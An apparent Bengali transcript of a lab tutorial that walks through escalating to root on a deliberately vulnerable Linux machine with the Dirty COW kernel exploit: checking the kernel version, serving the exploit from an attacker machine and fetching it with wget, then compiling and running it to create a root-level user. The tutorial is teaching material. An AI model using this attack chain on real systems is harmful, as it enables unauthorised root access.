Kernel exploit by vulnerable kernel। তো এই ল্যাবটি করার জন্য আমরা আমাদের অ্যাটাকার মেশিন থেকে টার্মিনালে আসব এবং SSH সার্ভিসের মাধ্যমে আমাদের vulnerable Linux privilege escalation মেশিনে কানেক্ট করতে টাইপ করব SSH user @vulnerable Linux privilege escalation মেশিনের IP দিয়ে এন্টার দিলে আমাদের কাছে পাসওয়ার্ড চাইবে। তো ইউজারের পাসওয়ার্ড হবে পাসওয়ার্ড 321। তো টাইপ করে এন্টার দিব। দেখতে পাচ্ছেন আমাদের vulnerable Linux privilege escalation মেশিনের ইউজার টার্মিনাল শো করতেছে। আমরা লিনাক্স মেশিনের কার্নেল ভার্সন জানতে টাইপ করব uname-a। তো এই হচ্ছে আমাদের কার্নেল ভার্সন। অ্যাকচুয়ালি এটি vulnerable কিনা তা জানতে কার্নেল ভার্সন কপি করে নিব এবং গুগলে গিয়ে পেস্ট করে কার্নেল ভার্সনের পর এক্সপ্লয়েট লিখে এন্টার দিব। দেখতে পাচ্ছেন এখানে একাধিক এক্সপ্লয়েট শো করতেছে। তো আমরা যদি এক্সপ্লয়েট ডিবিতে থাকা ডার্টি কাউ এক্সপ্লয়েটটি ওপেন করি, দেখতে পাচ্ছেন আমাদের vulnerable Linux privilege escalation মেশিনের কার্নেল ভার্সনের সাথে এটি পুরোপুরি ম্যাচ করছে। তো এক্সপ্লয়েটটি ডাউনলোড করতে ডাউনলোড অপশনে ক্লিক করব। দেখতে পাচ্ছেন আমাদের এক্সপ্লয়েটটি ডাউনলোড হয়ে গিয়েছে, যা একটি সি ফাইল। শুরুতেই এটিকে ট্রান্সফার করে নিতে অ্যাটাকার মেশিনে থাকা এক্সপ্লয়েট ফাইলের লোকেশন থেকে python3-m http.server পোর্ট নাম্বার দিয়ে এন্টার দিচ্ছি। ট্রান্সফারের জন্য ifconfig টাইপ করে আমাদের অ্যাটাকার মেশিনের আইপি চেক করে নিব। তো এই হচ্ছে আমাদের অ্যাটাকার মেশিনের আইপি। দেন vulnerable Linux privilege escalation মেশিনের টার্মিনালে ফিরে এসে কার্নেল এক্সপ্লয়েটের ফাইলটি ডাউনলোড করতে টাইপ করব wget http clone /attacker মেশিনের আইপি ক্লোন পোর্ট নাম্বার /kernel exploiter ফাইল নেম দিয়ে এন্টার দিব। দেখতে পাচ্ছেন আমাদের কার্নেল এক্সপ্লয়েটের ফাইলটি এখানে ডাউনলোড হয়ে গিয়েছে। যে কোনো এক্সপ্লয়েট নিয়ে কাজ করার আগে এক্সপ্লয়েট কোডটি বুঝে নিতে হয়, তাই ন্যানো টাইপ করে এক্সপ্লয়েট কোডের নাম দিয়ে এন্টার দিব। এই হচ্ছে আমাদের কার্নেল এক্সপ্লয়েটের কোড। লক্ষ্য করুন এই এক্সপ্লয়েটটি যেহেতু সি প্রোগ্রাম দিয়ে কোড করা, তাই এটি ইউজ করার প্রসেস এখানে মেনশন করে রেখেছে। তো আমরা এটি কপি করে নিব এবং টার্মিনালে এসে পেস্ট করে এন্টার দিব। দেখতে পাচ্ছেন আমাদের এখানে কার্নেল নামের নতুন একটি ফাইল ক্রিয়েট হয়েছে। এখন আমাদের এটিকে এক্সিকিউট করতে হবে। তো এটিকে এক্সিকিউট করতে // দিয়ে কার্নেল লিখে এন্টার দিচ্ছি। সে আমাদের নতুন একটি পাসওয়ার্ড সেট করতে বলছে। তো পাসওয়ার্ড দিয়ে এন্টার দিব। লক্ষ্য করুন এই কার্নেল এক্সপ্লয়েটটি আমাদের vulnerable Linux privilege escalation মেশিনে ফায়ারফার্ট নামের একটি ইউজার ক্রিয়েট করেছে, যার পাসওয়ার্ড একটু আগেই আমরা সেট করেছি। আপনাদের বোঝার সুবিধার্থে আমরা আইডি টাইপ করে এন্টার দিচ্ছি। দেখতে পাচ্ছেন আমাদের এই সিস্টেম লোকাল ইউজার হিসেবে লগইন আছে। এখন আমরা যদি এক্সপ্লয়েট থেকে ক্রিয়েট হওয়া ফায়ারফার্ট ইউজারে লগইন করি এবং আবারও যদি আইডি টাইপ করি, দেখতে পাচ্ছেন আমরা এই সিস্টেমের রুট জিআইডি এবং রুট ইউজার গ্রুপে সাকসেসফুলি অ্যাক্সেস পেয়েছি। তো এইভাবে একজন অ্যাটাকার লিনাক্স অপারেটিং সিস্টেমের কার্নেল ভার্সনের vulnerability মিস ইউজ করে তা দিয়ে লিনাক্স অপারেটিং সিস্টেমের রুট কন্ট্রোল নিয়ে নেয়।